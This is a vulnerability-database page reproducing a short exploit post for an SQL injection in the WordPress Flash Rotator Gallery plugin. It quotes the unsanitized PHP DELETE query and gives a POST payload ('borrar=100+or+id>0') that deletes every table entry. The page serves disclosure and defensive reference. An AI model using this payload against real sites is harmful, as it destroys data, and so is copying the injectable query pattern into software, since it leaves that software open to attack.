Lucene search
K

WordPress Flash Rotator Gallery plugin SQL injection Vulnerability

🗓️ 13 Mar 2017 00:00:00Reported by malwrforensicsType 
zdt
 zdt
🔗 0day.today👁 19 Views

WordPress Flash Rotator Gallery plugin SQL injection Vulnerabilit

Code
# Exploit Title: WordPress plugin Flash Rotator Gallery - SQL injection
# Date: 2017-03-12
# Exploit Author: malwrforensics
# Vendor Homepage: http://www.webpsilon.com/wordpress-plugins/flash-rotator-gallery/
# Software Link: https://downloads.wordpress.org/plugin/flash-rotator-gallery.zip
# Version: 0.1
# Tested on: Linux

HTTP request data:

POST http://192.168.205.102/wordpress/wp-admin/admin.php?page=flash_rotator_gallery.php HTTP/1.1
<snip>

borrar=100+or+id>0 #delete all entries


Technical details:
Affected file: flash-rotator-gallery.php
<snip>

if(isset($_POST['borrar'])) {
$sql = "DELETE FROM $table_name WHERE id = ".$_POST['borrar'].";"; #$_POST['borrar'] is not sanitized
$wpdb->query($sql);

<snip>

Thanks.

#  0day.today [2018-04-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Mar 2017 00:00Current
7.1High risk
Vulners AI Score7.1
19